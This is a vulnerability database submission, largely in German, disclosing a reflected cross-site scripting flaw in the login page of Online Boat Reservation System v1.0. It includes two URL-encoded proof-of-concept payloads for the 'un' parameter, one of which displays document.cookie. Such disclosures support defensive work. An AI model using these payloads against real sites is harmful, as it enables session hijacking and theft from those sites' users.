| Titel | Online Boat Reservation System v1.0 /boat/login.php post parameter 'un' exists xss vulnerability |
|---|
| Beschreibung | An issue was discovered in Online Boat Reservation System v1.0 v1.0.
There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /boat/login.php post parameter "un".
Payload1:un=a%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Ea&up=bb&login=
Payload2:un=a%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ea&up=bbb&login= |
|---|
| Quelle | ⚠️ https://github.com/jidle123/bug_report/blob/main/vendors/winex01/Online%20Boat%20Reservation%20System/XSS-1.md#online-boat-reservation-system-v10-by-winex01-has-cross-site-scripting-reflected |
|---|
| Benutzer | jidle (UID 41297) |
|---|
| Einreichung | 24.02.2023 12:34 (vor 3 Jahren) |
|---|
| Moderieren | 24.02.2023 20:36 (8 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 221755 [SourceCodester/code-projects Online Boat Reservation System 1.0 POST Parameter /boat/login.php un Cross Site Scripting] |
|---|
| Punkte | 19 |
|---|